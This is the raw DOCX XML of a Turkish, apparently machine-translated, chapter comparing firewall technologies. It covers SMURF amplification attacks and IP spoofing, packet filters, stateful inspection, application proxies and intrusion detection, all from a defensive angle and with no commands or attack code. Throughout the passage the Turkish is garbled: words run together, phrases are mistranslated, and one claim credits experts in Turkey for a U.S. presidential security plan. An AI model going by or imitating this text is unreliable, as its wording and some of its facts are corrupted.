            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>daktiloya</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t> çevire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32"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Comparing Firewall Technologies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>(Güvenlik Duvarı Teknolojilerini Karşılaştırm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32"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>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rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ocak 2001’nin başında yeni bir Web sayfası açıldı. Netscan olarak adlandırıldı, 1 ve yaratıcılar Web sitelerini yayınlamadan önce biraz çalışma yaptılar. Aslında, çalışma oldukça basit ama zaman alıcıydı. Yönlendirilen IPv4 adres alanının tamamına ping attılar; ya da daha kesin olmak gerekirse, bunlar .0 veya .255 ile biten her IP adresi ping. Gönderilen her PING için karşılığında bir PING REPLY bekleniyor. Ve her ağ içinBirden fazla paketle cevap verdiler, cevap sayısını saydılar ve veriyi bir veritabanına koydular. HerşeyGönderilen her paket için birden fazla paketle cevap veren ağların bir yükseltici olduğu kabul edildi.ağ. İnternetin tamamına ping yaptıktan sonra (az çok), Web sitelerinde 1024'ün bir listesini yayınladılarIP adresinden sorumlu olan kişinin e-posta adresi ve onunla ilişkili en kötü ağlarağ. En kötü ağlar, onlara tek bir cevap için en çok cevap veren ağlardır.PING veya en iyi amplifikasyon efekti.</w:t>
      </w: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Buradaki güvenlik sorunu, bir sahtekarlığı kullanarak bir ağa PING isteği göndermenin oldukça kolay olmasıdır. Kaynak IP Adresi. Ve alıcı ağ cevap verdiğinde, tüm bu cevaplar ilk PING’de verilen şekilde kaynak adrese gönderilecektir. Exhibit 42,1 gösterildiği gibi, saldırganın sürekli bu işlemi tekrarlayarak nihai alıcının İnternet bağlantısını da boyayabilirsiniz.</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slında, saldırgan bir T3 (45-Mbit) bağlantısını kesmek için yeterli trafik oluşturmak için bir ISDN bağlantısı kullan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ldırının başlatılması için birkaç SMURF amplifikatör ağının kullanılması. Ve izin veren ağlar olduğu sürec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tür bir büyütme işlemi, bir şebeke, kendisinin büyütme sorunu olmasa bile, bir saldırının hedefi olabilir ve saldırıyı önlemek için güvenlik duvarları gibi yapılabilecek çok fazla güvenlik sistemi yoktu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tür bir saldırı, İnternet'teki en büyük sitelerin bazılarına saldırmak için tekrar tekrar kullanıl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ubat 2000’de Yahoo, CNN, Ebay ve Amazon’a yapılan saldırılar da dahil. Bugünlerde, SMURF amplifikatör ağlarını arayan ve sonuçlarını yayınlayan birçok Web sitesi v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lenen. Mart 2001'de verilen bir sunumda bu yazar gerçeği olduğuna dikkat çeken ağların sayıs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öyle amplifikatörler Ocak 2001 yılından bu yana 1000'den fazla yüzde artmıştı olarak kullanılmasına karşı korunmasını deği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saldırıların ilginç bulgularından biri de yönlendiricilerin sorunlardan sorumlu tutulmasıy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duvarları. Ve haklıydılar; kötü yapılandırılmış İnternet yönlendiricileri, bu sorunların önemli bir parçasıy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akalar. Daha da kötüsü, bu spesifik PING tabanlı saldırının engellenmesi için tek gereksinimin ortaya konmasıy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ğları İnternete bağlayan tüm yönlendiricilerdeki bir parametre. Bu şimdi, “Yönlendiricilerdeki Yönlendirilmiş Yayın için Varsayılanın Değiştirilmesi” adlı RFC 2644 / BCP 34'te önerilen varsayılan haline gelmiştir. IP Kaynak Adresini Sahtecilik, ”, sahtekarlık saldırılarını daha iyi anlamak için.</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saldırıların ardından ilginç bir gözlem, Başkan Clinton’un Ulusal bir ilan etmesiyd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 Sistemleri Koruma Planını, Türkiye'deki en iyi güvenlik uzmanlarından bazılarının değerli yardımıyl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merika Birleşik Devletleri. Bu yazarın görüşüne göre, bu, kimin başında olması gerekenlerin mükemmel bir örneğ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ten sorumlu - yönetim kurulu ve bir şirketin CEO'su.</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on olarak, CNN, Yahoo ve Amazon gibi Web sitelerinin hepsinde güvenlik duvarları mevcuttu, ancak bunların önüne geçmedi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>saldırılar. Bu nedenle, güvenlik duvarı teknolojilerinin ve gerçekte ne tür bir güvenlik sağlayabileceklerinin tartışılması</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>sipariş.</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r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57973372" wp14:editId="5E9D7102">
            <wp:extent cx="2674620" cy="1958340"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="4113" name="Resim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1958340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Duvarı Teknolojileri Açıklaması</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Güvenlik Duvarları SSS 2</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ki temel güvenlik duvarı türünü tanımlar: ağ katmanı güvenlik duvarları ve uygulama katmanı güvenlik duvarları (ayrıca uygulama proxy güvenlik duvarları veya yalnızca proxy'ler olarak da bilinir). Bu bölümde, durumsal inceleme güvenlik duvarları, aralarındaki benzerlik ve farklılıkları daha kolay anlamayı kolaylaştırmak için ilk iki güvenlik duvarı türünün bir karışımı olarak tanımlan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kuyucu, ağ katmanının katman 3 olan OSI katman modelini zaten biliyor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 katmanı, Ek 42.2'de gösterildiği gibi katman 7'dedir. Bir güvenlik duvarı, üzerine bir tür güvenlik filtresi uygulanmış olarak, iki veya daha fazla ağ arasında paketleri ileri geri ileten bir yönlendirici olarak gösterilebili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r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Ağ Düzeyinde Güvenlik Duvarları: Paket Filtreler Paket filtre güvenlik duvarları genellikle erişim listelerine sahip bir yönlendiricidir. En temel haliyle, paket filtre güvenlik duvarı Her IP paketinin kaynak ve hedef IP adresini ve hedef portu temel alarak trafiği kontrol eder. Birçok paket filtre güvenlik duvarı ayrıca gelen arayüze dayanarak paketleri kontrol etmeyi sağlar ( İnternet veya dahili ağ?). Ayrıca, kaynak portu baz alınarak IP paketinin kontrolüne izin verebilirler, ürüne bağlı olarak gün ve saat, protokol türü (TCP, UDP veya ICMP) ve diğer IP seçenekleri de vardır. Paket filtre güvenlik duvarları hakkında hatırlanması gereken ilk şey, her IP paketini tek başına denetlemeleridir; onlar IP paketlerini bir oturumun parçası olarak görmeyin. Paket filtre güvenlik duvarları hakkında hatırlanması gereken ikinci şey, birçoğunun, varsayılan olarak, açık bir yapılandırmaya sahip olmalarıdır; Ve son olarak, paket filtreleri sadece bir paketin başlığını kontrol eder, paketin DATA kısmını kontrol etmez. Bu, bir servisi başka bir servis içinde tünelleme gibi tekniklerin kolayca bir paket filtresini atlayacağı anlamına gelir (örneğin, Telnet'i 80 numaralı port üzerinde standart Telnet portu 23'ün engellendiği bir güvenlik duvarı üzerinden çalıştırmak, ancak HTTP portu 80 açıktır. kaynak / hedef ve port numarasını görür, geçmesine izin verir).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59053656" wp14:editId="38026E90">
            <wp:extent cx="1333500" cy="1546860"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4114" name="Resim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546860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Paket Filtre Güvenlik Duvarlarını Neden Kullanmalı? Bazı güvenlik yöneticileri bunun farkında olmayabilir, ancak büyük olasılıkla zaten içinde çok sayıda cihaz var. paket filtreleme yapabilen bir ağ. En iyi örnekler çeşitli yönlendiricilerdir. Günümüzde çoğu (tümü değilse) yönlendiriciler, yönlendiriciden akan IP trafiğini çeşitli güvenlik dereceleriyle denetleyen erişim listeleriyle donatılabilir. Birçok ağda, sadece paket filtre güvenlik duvarı görevi görmek için onları doğru bir şekilde yapılandırma meselesi olacaktır. Aslında, yazar genellikle tüm yönlendiricilerin en az bir yönlendiricinin kendisinin ve çevresinin güvenliğini en düşük seviyede tutmak için erişim listelerini kullanın. kullanma paket filtreleme genellikle, diğer teknolojilere göre başka bir artı olan verim üzerinde çok az etki eder veya hiç bir etkiye sahip değildir. Son olarak, paket filtre güvenlik duvarları çoğu (tümü değilse) TCP / IP tabanlı hizmetleri destekle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den Paket Filtre Güvenlik Duvarlarını Kullanmıyorsunuz?</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h, onlar sadece OSI katman 3'te veya ağ katmanında genellikle denildiği gibi çalışırlar. Paket filtre güvenlik duvarları sadece tek IP paketlerini kontrol eder; Paketin bir oturumun parçası olup olmaması umrunda değil. Ayrıca, onlar yo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mel başlık bilgisi tamamlandığı sürece, paketin gerçek içeriğini kontrol edi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aynak ve hedef IP adresi). Paket filtre güvenlik duvarları için kurallar oluşturmak sinir bozucu ve zor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birçok farklı paket filtre güvenlik duvarı arasında tutarlı kuralları korumak genellikle çok zor olarak kabul edilir. Daha önce belirtildiği gibi, tipik açık-açık varsayılanlar çoğu durumda tehlikeli olarak düşünülmeli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urumsal Denetim Güvenlik Duvarlar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mel olarak, durumsal inceleme güvenlik duvarları, paket filtre güvenlik duvarları ile aynı şeydir, ancak paket filtreleme yeteneklerine ek olarak bağlantıların durumunu takip edebilme özelliğine sahiptir. Bir oturumun başlatılıp başlatılmadığını, şu anda veri iletildiğini (her iki yönde) veya kapatıldığını dinamik olarak takip ederek güvenlik duvarı, veri aktarımına daha güçlü güvenlik uygulayabilir. Ayrıca, durum bilgisi olan denetleme güvenlik duvarlarının HTTP, FTP ve SMTP gibi popüler hizmetleri kullanmanın çeşitli yolları vardır. Bu son seçenekler (bunlardan pek çok çeşidi ola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üründen ürüne) güvenlik duvarının gerçekten de TCP trafiğine gidiyorsa HTTP trafiği olup olmadığını kontrol etmesini sağlar 80</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rafiği “analiz ederek” bir ağdaki bir ana bilgisayarda. Bir paket filtresi yalnızca bunun HTTP trafiği olduğunu varsayar, çünkü</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ana sistemde 80 numaralı TCP bağlantı noktasına gidiyor; paketin VERİ bölümünü kontrol etmenin hiçbir yolu yoktur, ancak durumsal inceleme bunu kısmen yapabili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urum bilgisi olan bir inceleme güvenlik duvar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turumları. Durum bilgisi olan denetleme güvenlik duvarları genellikle başarısız bir varsayılan konfigürasyona sahiptir, yani bir paketin nasıl işleneceğini bilmiyorlarsa bir paketin geçmesine izin vermeyecekleri anlamına gelir. Buna ek olarak, onlar da sağlay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paket filtreleriyle karşılaştırıldığında paketler ve oturumlar içindeki gerçek içerikleri (verilerin kendisini) “anlayarak” ilave bir güvenlik seviyesi. Bu son bölüm yalnızca üründen ürüne farklı olabilecek belirli hizmetler için geçerli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xml:space="preserve">Neden Durumlu Denetim Güvenlik Duvarları Kullanmalı? </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Durumlu inceleme güvenlik duvarları, paket filtrelemeden daha yüksek performans sağlar ve daha fazla güvenlik özelliği sunar. Bu özellikler ortak ve popüler servislerin ekstra kontrolünü sağlayabilir. Durumsal denetleme güvenlik duvarları, çoğu (tümü değilse de) hizmetlerin çoğunu, örneğin paket filtreleri gibi, saydam bir şekilde destekler ve istemci yapılandırmalarını değiştirmeye ya da çalışması için herhangi bir ek yazılım eklemeye gerek yoktu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den Durumlu Denetim Güvenlik Duvarları Kullanmıyorsunuz?</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urum bilgisi olan inceleme güvenlik duvarları, uygulama düzeyi güvenlik duvarlarıyla aynı güvenlik seviyesini sağlayamayabilir. Onlar izin ver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unucu ve müşteri, paket filtreler gibi birbirleriyle “doğrudan” konuşurlar. Bu bir güvenlik riski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duvarı, güvenlik duvarından geçen paketlerin DATA içeriğinin nasıl yorumlanacağını bilmiyor. Üsteli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rahatsız edici, birçok insanın durumsal denetim güvenlik duvarlarını yapılandırmanın daha kolay olduğunu düşünmes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anlış, uygulama düzeyinde güvenlik duvarlarına kıyasla. Bunun nedeni paket filtrelerinin ve durum kontrolünün yapılması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duvarları çoğu hizmeti şeffaf bir şekilde desteklemese bile, uygulama düzeyinde güvenlik duvarları genellikle çok sınırlı sayıda hizmeti destekler ve desteklenmeyen servislerle çalışmak için istemci yazılımında değişiklik yapılmasını gerektir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twork Associates adlı bir bildiri kitabında, 3</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sayar Güvenlik Enstitüsü (CSI), “Güvenlik duvarı üzerinden tehlikeli hizmetlere izin vermek için durumsal denetim güvenlik duvarlarını yapılandırmak oldukça önemsiz, aslında önemsiz…” demiştir. Uygulama proxy güvenlik duvarları, tasarım gereği, yapılandırma sırasında hata yapmayı çok daha zorlaştırır. ”</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twork Associates'ten bir bildiri kitabında, 3, Bilgisayar Güvenliği Enstitüsü (CSI), “Tehlikeli hizmetlere izin vermek için durumsal denetim güvenlik duvarlarını yapılandırmak, aslında önemsiz bir şey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duvarı…. Uygulama proxy güvenlik duvarları, tasarım sırasında, hatalar sırasında hata yapmayı çok daha zor hale getir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apılandırmas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bii ki, eğer doğru bir şekilde yapılandırılmadıysa, hiçbir sistemin güvenli olmadığını söylemek gereksizdir. İnsan hataları ve hataları, güvenlik sorunlarının bir, iki ve üç nedenidir, değil mi?</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 Seviyesi Güvenlik Duvarlar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 düzeyinde güvenlik duvarları (veya yalnızca proxy'ler), müşteriden proxy'den istemci adına bir görev gerçekleştirmesini istediği “ortadaki adam” olarak çalışır. Bu, Web sayfalarını almak, posta göndermek, FTP kullanarak dosyaları almak, vb. Gibi görevleri içerebilir. Proxy'ler uygulamaya özeldir, yani kullanılacak belirli bir uygulamayı (veya daha tam olarak uygulama düzeyinde protokolü) desteklemeleri gerekir. . İçin standartlar da v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n popüler SOCKS olmak üzere, genel proxy işlevi. SOCKS, aslen David tarafından yazıl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oblas ve NEC tarafından daha da geliştirilmiştir. SOCKS'i destekleyen uygulamalar iletişim kurabilecekt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OCKS standardını da destekleyen güvenlik duvarları.4 Durumlu bir inceleme güvenlik duvarına benzer şekilde, uygulama düzeyinde bir güvenlik duvarının normal varsayılanı başarısız olur, bu da nasıl kullanılacağını anlamadığı paketleri / oturumları engelleyeceği anlamına geli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den Uygulama Seviyesi Güvenlik Duvarları Kullanmal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er şeyden önce, temelde yalnızca destekledikleri basit gerçeğe dayanarak yüksek düzeyde güvenlik sağlar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xml:space="preserve">çok sınırlı sayıda hizmet; bununla birlikte günlük olarak ihtiyaç duyulan olağan hizmetlerin çoğunu olmasa da destekler. Uygulama katmanındaki protokolleri anlarlar ve böylece bir protokolün bölümlerini engelleyebilirler </w:t>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(FTP kullanarak dosya alınmasına izin verir, ancak örnek olarak FTP kullanarak dosya göndermeyi reddederler). Güvenlik duvarı satıcısına ve sürümüne bağlı olarak güvenlik açıklarını da tespit edip engelleyebilir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yrıca, müşteri ile sunucu arasında doğrudan temas yoktur; güvenlik duvarı idare edece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üşteri ve sunucu için tüm istek ve cevaplar. Bir proxy sunucusu ile kullanıcı gerçekleştirmek de kolay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imlik doğrulama ve pek çok güvenlik uygulayıcısı, mevcut kapsamlı günlük kaydı düzeyini takdir edecekt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 düzeyinde güvenlik duvarlar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Performans nedenleriyle birçok uygulama düzeyinde güvenlik duvarı, verileri daha hızlı yanıt vererek önbelleğe a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Örneğin, sık erişilen Web sayfalarına erişim için süreleri ve daha yüksek verimi Yazar genellikle bir güvenlik duvarının bunu yapmasını önermez, çünkü bir güvenlik duvarının trafik denetimini ele alması ve yüksek düzeyde güvenlik sağlaması gerekir. Bunun yerine, güvenlik uzmanları tek başına bir önbellekleme kullanmayı düşünmel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rtak Web sitelerine erişirken performansı artırmak için proxy sunucusu. Böyle bir tek başına önbellekleme proxy sunucusu elbette ek içerik güvenliği ile de donatılabilir ve böylece içeriğe ve diğer sorunlara bağlı olarak Web sitelerine erişimi kontrol edebil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den Uygulama Seviyesi Güvenlik Duvarlarını Kullanmıyorsunuz?</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sarım gereği, uygulama düzeyinde güvenlik duvarları yalnızca sınırlı sayıda hizmeti destekler. Diğer uygulama hizmetleri / protokolleri için destek isteniyorsa, uygulama düzeyinde bir güvenlik duvarı üzerinden çalışmak için uygulamaların değiştirilmesi gerekebilir. Bu tür bir güvenlik duvarının sağlayabileceği yüksek güvenlik seviyesi göz önüne alındığında (konfigürasyonuna bağlı olarak elbette), paket filtrelemeye ve durumsal inceleme güvenlik duvarlarına kıyasla performans üzerinde çok olumsuz bir etkisi olabili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Pazarın Gerçekte Neye İhtiyacı Var? Günümüzde pek çok güvenlik duvarı, bu teknolojileri birlikte basit ve kullanımı kolay bir ürüne karıştırıyor gibi görünmektedir. Güvenlik duvarları “anahtar teslimi” veya “hepsi bir arada” çözümü olmaya çalışır. Güvenlik duvarında, az ya da çok tarafından yapılandırılabilen güvenlik takıp açmak, bu yazarın çok az inancının olduğu bir şeydir. Ve hepsi bir arada çözüm VPN, virüsten koruma, içerik güvenliği / filtreleme, trafik şekillendirme ve benzeri işlevleri entegre eden Bu yazarın çok az güvendiği bir şey. Aslında, güvenlik duvarları giderek daha karmaşık hale geliyor gibi görünüyor Son kullanıcılar için yapılandırma, kullanma ve anlamalarını kolaylaştırır. Bu biraz yanlış görünüyor; artırarak Bir üründeki kod miktarı, üründeki güvenlik açıklarının artması ve çoğu muhtemelen üstel olarak. Yazarın görüşüne göre, bir güvenlik duvarı, çoğu kullanıcının görmeyeceği veya Not. Kullanıcılar orada olduğunu bile bilmemeli. Piyasa ne istediğine karar verir ve satıcılar tam olarak bunu sağlar. Ancak piyasa her zaman biliyor mu bunun için iyi olan nedir? Bu, güvenlik profesyonellerinin her zaman - öğretmeye öncelik vermesi gereken bir problemdir güvenlik anlayışı ve güvenlik bilinc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Firewall Technologies: Hızlı Özet</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nel bir kural olarak, paket filtreleri en düşük güvenlik seviyesini sağlar, ancak en yüksek verimi sağlar. Onlar sahip</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ınırlı güvenlik seçenekleri ve özellikleri ve özellikle çok sayıda varsa, yönetimi zor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nların bir ağda. Durum bilgisi olan denetleme güvenlik duvarları daha yüksek bir güvenlik düzeyi sağlar, ancak paket filtrelerle aynı verimi vermeyebilir. Bugün piyasadaki önde gelen güvenlik duvarları, çoğu ortam için en iyi güvenlik, yönetilebilirlik, verimlilik ve şeffaf entegrasyon karışımı olarak kabul edilen durumsal denetim güvenlik duvarlarıdı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 düzeyinde güvenlik duvarları, en yüksek düzeyde güvenlik sağlamak için birçok kişi tarafından kabul edilir, ancak diğer iki güvenlik duvarı teknolojisine kıyasla daha az verim ver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er durumda, güvenlik uzmanları iyi güvenlik sağlamak için hiçbir zaman güvenlik duvarına asla güvenmemelidir. Ve hay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Bir şirketin hangi güvenlik duvarını kullandığı önemli değil, doğru yapılandırılmadığı takdirde fazla güvenlik sağlamaz. Ve bu genellikle oldukça fazla iş gerektiri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vre Savunması ve Güvenlik Duvarları Nasıl Uyuyo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Pek çok insan, kötü niyetli bilgisayar korsanlarının İnternet’te “dışarıda” olduğuna inanıyor gibi gözüküyo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firmadaki meslektaşlar, içten veya dıştan yasadışı bir şey yapmayı düşünürlerdi. Ne yazık ki, ancak, dahili çalışanların bilgisayarla ilgili tüm suçların belki de yüzde 50'sini gerçekleştirdiğini gösteren istatistikler var. Bu nedenle güvenlik duvarı ve çevresindeki ortamdaki güvenliğin iki şekilde çalıştığını açıklamak gerekir. İnternetteki bilgisayar korsanlarının dahili ağa erişmesine izin verilmez ve dahili ağdaki kişilerin (veya virüsler ve Truva atları gibi düşmanca kodlar) dışlara hassas veriler göndermesi engellenmel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ğ. İlki yapılandırmak ikinciden daha kolaydır. Bunun pratik bir örneği olarak, işte bu</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azar tarafından bir süre önce gerçekleştirilen bir İnternet penetrasyon testi sırasında oldu.</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Saldırı Tespit Sistemleri ve Güvenlik Duvarları Son zamanlarda, gittikçe daha fazla şirket, ağlarına izinsiz giriş tespit sistemleri (IDS) kullanıyor. İşte hata yapmanın kolay olduğu başka bir alan. Her şeyden önce, bir IDS bir şirketin bilgisayar korsanlarına karşı güvenliğini arttırmasına gerçekten yardımcı olmuyor. Bir IDS bir şirketin bir saldırıyı daha iyi tespit etmesine ve belgelemesine yardımcı olur, ancak çoğu durumda saldırıyı durduramaz. Bir IDS'nin, şu sıralar uzun zamandır var olan kapsamlı günlük ve otomatik / manuel analizler için yeni bir terim olduğunu söylemek caziptir. Bir süre önce, birisi otomatik olarak engelleyebilecek bir IDS oluşturma fikriyle geldi çeşitli saldırılar veya saldırıları engellemek için güvenlik duvarları gibi diğer sistemleri yeniden yapılandırın. Bir sahtekarlık saldırısı yaparak (bugünlerde çok kolay), bilgisayar korsanları güvenilir bir kaynaktan (üçüncü taraf) kaynaklanan sahte bir saldırı oluşturarak IDS'nin şirket ile güvenilir kaynak arasındaki tüm iletişimi engellemesini sağlayabilir. Birdenbire herkes bu tür otomatik sistemler fikrinin muhtemelen kötü bir fikir olduğunu anladı.</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z w:val="44"/>
          <w:szCs w:val="44"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Genel Öneriler ve Sonuç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areket ettiği çeşitli ağlara ve sistemlere ek olarak, bir güvenlik duvarı da kendini korumak için yapılandırılmalı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dan veri. Aslında, bir güvenlik duvarı da İnterneti “korumalı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acker'lar”, nerede ve kim olursa olsun, İnternet’e bağlı diğer partilere saldırmaktan. çevreleye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önelticiler, anahtarlar ve sunucular gibi ağ donanımları da güvenlik duvarını koruyacak şekilde yapılandırılmalı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istemin kendisine ek olarak çevre. Güvenlik uzmanları, İnternete erişime izin vermeden önce kullanıcı kimlik doğrulamasını kullanmayı düşünmelidir. Bu, çoğu durumda, virüslerin ve Truva atlarının örneğin HTTP, FTP ve Telnet gibi protokolleri kullanarak Internet'teki ana makinelerle temas kurmasını engel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öylemeye gerek olmayabilir, ancak İnternet’in bir şirket ağından kişisel olarak kullanılmas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asak olmak. Tabii ki, buradaki kontrol seviyesi tartışılabilir, ancak konu kullanıcıları engellemekt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hlikeli içerik indirme (virüs, Truva atları) ve dahili ağdan dosya gönderm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POP3, SMTP, FTP, HTTP gibi protokoller ve ASCII veya ikili dosyalarda dosya gönderilmesine izin veren diğer protokol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xml:space="preserve">biçimleri. Son olarak, güvenliği, şirketin güvenlik politikasında istenen (veya aranan) seviyeyle gerçekten eşleşen seviyeye getirmek için de başka araçlar kullanılmalıdır. Yazarın deneyiminde, muhtemelen tüm güvenlik duvarı </w:t>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>kurulumlarının yüzde 50'sinden azı kapsamlı bir günlük kaydı yapıyor ve güvenlik duvarı sahiplerinin yüzde 5'inden azı aslı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faydalı log analizi, raporlama ve istatistiklere bile benzeyen bir şey yapmak. Bazılarına gör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utum “güvenlik duvarımız var, bu yüzden güvendeyiz.” Böyle bir tutum hem aptal hem de yanlıştır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="2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0"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Güvenlik Sanal Özel Ağlar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
